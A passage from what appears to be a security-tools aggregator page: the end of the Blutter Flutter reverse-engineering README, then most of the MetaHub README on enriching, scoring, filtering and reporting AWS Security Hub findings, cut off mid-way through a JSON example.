  • blutter_frida.js the frida script template for the target application
  • objs.txt complete (nested) dump of Object from Object Pool
  • pp.txt all Dart objects in Object Pool

Directories

  • bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
  • blutter contains source code. need building against Dart VM library
  • build contains building projects which can be deleted after finishing the build process
  • dartsdk contains checkout of Dart Runtime which can be deleted after finishing the build process
  • external contains 3rd party libraries for Windows only
  • packages contains the static libraries of Dart Runtime
  • scripts contains python scripts for getting/building Dart

Generating Visual Studio Solution for Development

I use Visual Studio to delevlop Blutter on Windows. --vs-sln options can be used to generate a Visual Studio solution.

python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln

TODO

  • More code analysis
    • Function arguments and return type
    • Some psuedo code for code pattern
  • Generate better Frida script
    • More internal classes
    • Object modification
  • Obfuscated app (still missing many functions)
  • Reading iOS binary
  • Input as apk or ipa


Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs: YOUR context, identifying ownership, and calculate an impact scoring based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanners (like Prowler).

MetaHub describe your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resources tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to that instance itself but also its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.

After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations and in addition to the information from the security findings affecting the resource all together, MetaHub will generate a Scoring for each finding.

Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for a an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account cloudtrail, and impact



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resources. The context module has five main parts: config (which includes associations as well), tags, cloudtrail, and account. By default config and tags are enabled, but you can change this behavior using the option --context (for enabling all the context modules you can use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.

Config

Under the config key, you can find anyting related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource type supports this API. You can check supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the key cloudtrail, you will find critical Cloudtrail events related to the affected resource, such as creating events.

The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.

For example for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the key account, you will find information about the account where the affected resource is runnning, like if it's part of an AWS Organizations, information about their contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way, it is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates the how the the affected resource is exposed to other networks. For example, if the affected resource is public, if it is part of a VPC, if it has a public IP or if it is protected by a firewall or a security group.

Possible Statuses Value Description
ο”΄ effectively-public 100% The resource is effectively public from the Internet.
 restricted-public 40% The resource is public, but there is a restriction like a Security Group.
 unrestricted-private 30% The resource is private but unrestricted, like an open security group.
 launch-public 10% These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet.
 restricted 0% The resource is restricted.
ο”΅ unknown - The resource couldn't be checked

Access

Access evaluates the resource policy layer. MetaHub checks every available policy including: IAM Managed policies, IAM Inline policies, Resource Policies, Bucket ACLS, and any association to other resources like IAM Roles which its policies are also analyzed . An unrestricted policy is not only an itsue itself of that policy, it afected any other resource which is using it.

Possible Statuses Value Description
ο”΄ unrestricted 100% The principal is unrestricted, without any condition or restriction.
ο”΄ untrusted-principal 70% The principal is an AWS Account, not part of your trusted accounts.
 unrestricted-principal 40% The principal is not restricted, defined with a wildcard. It could be conditions restricting it or other restrictions like s3 public blocks.
 cross-account-principal 30% The principal is from another AWS account.
 unrestricted-actions 30% The actions are defined using wildcards.
 dangerous-actions 30% Some dangerous actions are defined as part of this policy.
 unrestricted-service 10% The policy allows an AWS service as principal without restriction.
 restricted 0% The policy is restricted.
ο”΅ unknown - The policy couldn't be checked.

Encryption

Encryption evaluate the different encryption layers based on each resource type. For example, for some resources it evaluates if at_rest and in_transit encryption configuration are both enabled.

Possible Statuses Value Description
ο”΄ unencrypted 100% The resource is not fully encrypted.
 encrypted 0% The resource is fully encrypted including any of it's associations.
ο”΅ unknown - The resource encryption couldn't be checked.

Status

Status evaluate the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate if the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate if those resources are attached to any other resource.

Possible Statuses Value Description
 attached 100% The resource supports attachment and is attached.
 running 100% The resource supports running and is running.
 enabled 100% The resource supports enabled and is enabled.
 not-attached 0% The resource supports attachment, and it is not attached.
 not-running 0% The resource supports running and it is not running.
 not-enabled 0% The resource supports enabled and it is not enabled.
ο”΅ unknown - The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account id or the account alias. You can define your own environemnts definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
 production 100% It is a production resource.
 staging 30% It is a staging resource.
 development 0% It is a development resource.
ο”΅ unknown - The resource couldn't be checked for enviroment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the Tag awsApplication, but you can extend this functionality based on your context for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on account id or alias. You can define your application definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
ο”΅ unknown - The resource couldn't be checked for application.

Findings Soring

As part of the impact score calculation, we also evaluate the total ammount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates it's impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Created enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tagging from affected resources
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context* outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations, like, for example, if the resource is public, if it is encrypted, only if they are part of a VPC, if they are using a specific IAM role, and more. For more information, refer to Config filters and Tags filters for more information.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, With MetaHub, you can back enrich your findings directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update security findings altogether. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing Workflow Status using the option --update-findings. As an example, you identified that you have hundreds of security findings about public resources. Still, based on the MetaHub context, you know those resources are not effectively public as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your finding with a custom text for future reference.

MetaHub supports different Output Modes, some of them json based like json-inventory, json-statistics, json-short, json-full, but also powerfull html, xlsx and csv. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources, adding the tag Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and it's weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/reources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to repostiory dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tagging for MetaHub containers are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, you will need this if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume, adding the option --mh-assume-role in the Lambda function configuration (See previous step) and adding the corresponding policy to allow the Lambda to assume that role in the lambda role.

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means that it will update your finding back with MetaHub outputs. If you want to change this, see Customize Lambda behavior

You need first to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID= "ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY= "XXXXXXXXX"
export AWS_SESSION_TOKEN= "XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will assume the one you are logged in.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}

Configuring Context

If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries because the affected resources are not in the same AWS Account that the AWS Security Hub findings. The --mh-assume-role will be used to connect with the affected resources directly in the affected account. This role needs to have enough policies for being able to describe resources.

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters for filter findings, as this option relies on AWS API for filtering. You can't use the options --update-findings or --enrich-findings as those findings are not in the AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all findings titles together under each affected resource and the AwsAccountId, Region, and ResourceType:

JSON-Full

Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column
  • You can group/ungroup findings
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.

Β 

XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using the:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE filtering for AWS Security Hub using the option --sh-filters, the same way you would filter using AWS CLI but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template Security Hub Filtering using YAML templates.

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW

If a value contains spaces, you should specify it using double quotes: "ProductName="Security Hub"

You can add how many different filters you need to your query and also add the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub like "EQUALS' | 'PREFIX' | 'NOT_EQUALS' | 'PREFIX_NOT_EQUALS". You can call your YAML file using the option --sh-template <<FILE>>.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metaHub --sh-template templates/default.yml

Config Filters

MetaHub supports Config filters (and associations) using KEY=VALUE where the value can only be True or False using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True means True or with data.
  • A Config filter set to False means False or without data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=False

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Tags for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update your AWS Security Hub Findings workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. AWS Security Hub API is limited to 100 findings per update. Metahub will split your results into 100 items chucks to avoid this limitation and update your findings beside the amount.

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW I found two affected resources with three finding each making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public=True with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-checks public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.

Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.

Duplication is when you use more than one scanner and get the same problem from more than one.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have in your dashboard four findings for one resource!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
